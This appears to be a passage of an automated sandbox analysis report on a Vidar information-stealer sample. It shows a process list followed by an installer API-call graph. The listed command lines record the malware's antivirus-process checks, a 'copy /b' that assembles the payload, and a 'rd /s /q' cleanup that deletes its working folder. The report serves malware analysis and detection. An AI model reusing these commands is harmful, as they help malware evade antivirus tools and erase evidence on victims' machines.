                                                                                                  Commandline:findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c md 447331
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /V "typesfaxincreasecompound" Ensemble
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:Buyer.pif p
                                                                                                  Imagebase:0xf40000
                                                                                                  File size:946'784 bytes
                                                                                                  MD5 hash:848164D084384C49937F99D5B894253E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:choice /d y /t 5
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:28'160 bytes
                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:timeout /t 10
                                                                                                  Imagebase:0x770000
                                                                                                  File size:25'088 bytes
                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:13.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:20.6%
                                                                                                    Total number of Nodes:1523
                                                                                                    Total number of Limit Nodes:39
4595->4597 4598 4062a3 11 API calls 4596->4598 4599 40145c 18 API calls 4597->4599 4600 402f7d 4598->4600 4605 402f9d 4599->4605 4601 4062a3 11 API calls 4600->4601 4602 402f90 4601->4602 4603 402fa2 4602->4603 4604 402f98 4602->4604 4607 4060e7 9 API calls 4603->4607 4606 403e74 5 API calls 4604->4606 4606->4605 4607->4605 4608 4023f0 4609 402403 4608->4609 4610 4024da 4608->4610 4611 40145c 18 API calls 4609->4611 4612 404f72 25 API calls 4610->4612 4613 40240a 4611->4613 4618 4024f1 4612->4618 4614 40145c 18 API calls 4613->4614 4615 402413 4614->4615 4616 402429 LoadLibraryExW 4615->4616 4617 40241b GetModuleHandleW 4615->4617 4619 40243e 4616->4619 4620 4024ce 4616->4620 4617->4616 4617->4619 4632 406365 GlobalAlloc WideCharToMultiByte 4619->4632 4621 404f72 25 API calls 4620->4621 4621->4610 4623 402449 4624 40248c 4623->4624 4625 40244f 4623->4625 4626 404f72 25 API calls 4624->4626 4628 401435 25 API calls 4625->4628 4630 40245f 4625->4630 4627 402496 4626->4627 4629 4062a3 11 API calls 4627->4629 4628->4630 4629->4630 4630->4618 4631 4024c0 FreeLibrary 4630->4631 4631->4618 4633 406390 GetProcAddress 4632->4633 4634 40639d GlobalFree 4632->4634 4633->4634 4634->4623 4635 402df3 4636 402dfa 4635->4636 4638 4019ec 4635->4638 4637 402e07 FindNextFileW 4636->4637 4637->4638 4639 402e16 4637->4639 4641 406009 lstrcpynW 4639->4641 4641->4638 4642 402175 4643 401446 18 API calls 4642->4643 4644 40217c 4643->4644 4645 401446 18 API calls 4644->4645 4646 402186 4645->4646 4647 4062a3 11 API calls 4646->4647 4651 402197 4646->4651 4647->4651 4648 4021aa EnableWindow 4650 4030e3 4648->4650 4649 40219f ShowWindow 4649->4650 4651->4648 4651->4649 4659 404077 4660 404081 4659->4660 4661 404084 lstrcpynW lstrlenW 4659->4661 4660->4661 4662 405479 4663 405491 4662->4663 4664 4055cd 4662->4664 4663->4664 4665 40549d 4663->4665 4666 40561e 4664->4666 4667 4055de GetDlgItem GetDlgItem 4664->4667 4668 4054a8 SetWindowPos 4665->4668 4669 4054bb 4665->4669 4671 405678 
4666->4671 4679 40139d 80 API calls 4666->4679 4670 403d3f 19 API calls 4667->4670 4668->4669 4673 4054c0 ShowWindow 4669->4673 4674 4054d8 4669->4674 4675 405608 SetClassLongW 4670->4675 4672 403daf SendMessageW 4671->4672 4692 4055c8 4671->4692 4701 40568a 4672->4701 4673->4674 4676 4054e0 DestroyWindow 4674->4676 4677 4054fa 4674->4677 4678 40141d 80 API calls 4675->4678 4729 4058dc 4676->4729 4680 405510 4677->4680 4681 4054ff SetWindowLongW 4677->4681 4678->4666 4682 405650 4679->4682 4685 405587 4680->4685 4686 40551c GetDlgItem 4680->4686 4681->4692 4682->4671 4687 405654 SendMessageW 4682->4687 4683 40141d 80 API calls 4683->4701 4684 4058de DestroyWindow EndDialog 4684->4729 4688 403dca 8 API calls 4685->4688 4690 40554c 4686->4690 4691 40552f SendMessageW IsWindowEnabled 4686->4691 4687->4692 4688->4692 4689 40590d ShowWindow 4689->4692 4694 405559 4690->4694 4695 4055a0 SendMessageW 4690->4695 4696 40556c 4690->4696 4704 405551 4690->4704 4691->4690 4691->4692 4693 406805 18 API calls 4693->4701 4694->4695 4694->4704 4695->4685 4699 405574 4696->4699 4700 405589 4696->4700 4697 403d18 SendMessageW 4697->4685 4698 403d3f 19 API calls 4698->4701 4702 40141d 80 API calls 4699->4702 4703 40141d 80 API calls 4700->4703 4701->4683 4701->4684 4701->4692 4701->4693 4701->4698 4705 403d3f 19 API calls 4701->4705 4720 40581e DestroyWindow 4701->4720 4702->4704 4703->4704 4704->4685 4704->4697 4706 405705 GetDlgItem 4705->4706 4707 405723 ShowWindow EnableWindow 4706->4707 4708 40571a 4706->4708 4730 403d85 EnableWindow 4707->4730 4708->4707 4710 40574d EnableWindow 4713 405761 4710->4713 4711 405766 GetSystemMenu EnableMenuItem SendMessageW 4712 405796 SendMessageW 4711->4712 4711->4713 4712->4713 4713->4711 4731 403d98 SendMessageW 4713->4731 4732 406009 lstrcpynW 4713->4732 4716 4057c4 lstrlenW 4717 406805 18 API calls 4716->4717 4718 4057da SetWindowTextW 4717->4718 4719 40139d 80 API calls 4718->4719 4719->4701 4721 405838 CreateDialogParamW 4720->4721 
4720->4729 4722 40586b 4721->4722 4721->4729 4723 403d3f 19 API calls 4722->4723 4724 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4723->4724 4725 40139d 80 API calls 4724->4725 4726 4058bc 4725->4726 4726->4692 4727 4058c4 ShowWindow 4726->4727 4728 403daf SendMessageW 4727->4728 4728->4729 4729->4689 4729->4692 4730->4710 4731->4713 4732->4716 4733 4020f9 GetDC GetDeviceCaps 4734 401446 18 API calls 4733->4734 4735 402116 MulDiv 4734->4735 4736 401446 18 API calls 4735->4736 4737 40212c 4736->4737 4738 406805 18 API calls 4737->4738 4739 402165 CreateFontIndirectW 4738->4739 4740 4030dc 4739->4740 4741 4030e3 4740->4741 4743 405f51 wsprintfW 4740->4743 4743->4741 4744 4024fb 4745 40145c 18 API calls 4744->4745 4746 402502 4745->4746 4747 40145c 18 API calls 4746->4747 4748 40250c 4747->4748 4749 40145c 18 API calls 4748->4749 4750 402515 4749->4750 4751 40145c 18 API calls 4750->4751 4752 40251f 4751->4752 4753 40145c 18 API calls 4752->4753 4754 402529 4753->4754 4755 40253d 4754->4755 4756 40145c 18 API calls 4754->4756 4757 4062a3 11 API calls 4755->4757 4756->4755 4758 40256a CoCreateInstance 4757->4758 4759 40258c 4758->4759 4760 40497c GetDlgItem GetDlgItem 4761 4049d2 7 API calls 4760->4761 4766 404bea 4760->4766 4762 404a76 DeleteObject 4761->4762 4763 404a6a SendMessageW 4761->4763 4764 404a81 4762->4764 4763->4762 4767 404ab8 4764->4767 4769 406805 18 API calls 4764->4769 4765 404ccf 4768 404d74 4765->4768 4773 404bdd 4765->4773 4778 404d1e SendMessageW 4765->4778 4766->4765 4776 40484e 5 API calls 4766->4776 4789 404c5a 4766->4789 4772 403d3f 19 API calls 4767->4772 4770 404d89 4768->4770 4771 404d7d SendMessageW 4768->4771 4775 404a9a SendMessageW SendMessageW 4769->4775 4780 404da2 4770->4780 4781 404d9b ImageList_Destroy 4770->4781 4791 404db2 4770->4791 4771->4770 4777 404acc 4772->4777 4779 403dca 8 API calls 4773->4779 4774 404cc1 SendMessageW 4774->4765 4775->4764 4776->4789 4782 403d3f 19 API calls 4777->4782 4778->4773 4784 
404d33 SendMessageW 4778->4784 4785 404f6b 4779->4785 4786 404dab GlobalFree 4780->4786 4780->4791 4781->4780 4787 404add 4782->4787 4783 404f1c 4783->4773 4792 404f31 ShowWindow GetDlgItem ShowWindow 4783->4792 4788 404d46 4784->4788 4786->4791 4790 404baa GetWindowLongW SetWindowLongW 4787->4790 4799 404ba4 4787->4799 4802 404b39 SendMessageW 4787->4802 4803 404b67 SendMessageW 4787->4803 4804 404b7b SendMessageW 4787->4804 4798 404d57 SendMessageW 4788->4798 4789->4765 4789->4774 4793 404bc4 4790->4793 4791->4783 4794 404de4 4791->4794 4797 40141d 80 API calls 4791->4797 4792->4773 4795 404be2 4793->4795 4796 404bca ShowWindow 4793->4796 4807 404e12 SendMessageW 4794->4807 4810 404e28 4794->4810 4812 403d98 SendMessageW 4795->4812 4811 403d98 SendMessageW 4796->4811 4797->4794 4798->4768 4799->4790 4799->4793 4802->4787 4803->4787 4804->4787 4805 404ef3 InvalidateRect 4805->4783 4806 404f09 4805->4806 4813 4043ad 4806->4813 4807->4810 4809 404ea1 SendMessageW SendMessageW 4809->4810 4810->4805 4810->4809 4811->4773 4812->4766 4814 4043cd 4813->4814 4815 406805 18 API calls 4814->4815 4816 40440d 4815->4816 4817 406805 18 API calls 4816->4817 4818 404418 4817->4818 4819 406805 18 API calls 4818->4819 4820 404428 lstrlenW wsprintfW SetDlgItemTextW 4819->4820 4820->4783 4821 4026fc 4822 401ee4 4821->4822 4824 402708 4821->4824 4822->4821 4823 406805 18 API calls 4822->4823 4823->4822 4120 4019fd 4121 40145c 18 API calls 4120->4121 4122 401a04 4121->4122 4123 405e7f 2 API calls 4122->4123 4124 401a0b 4123->4124 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 
4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 
401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 
3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 
3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 
3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 
3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 
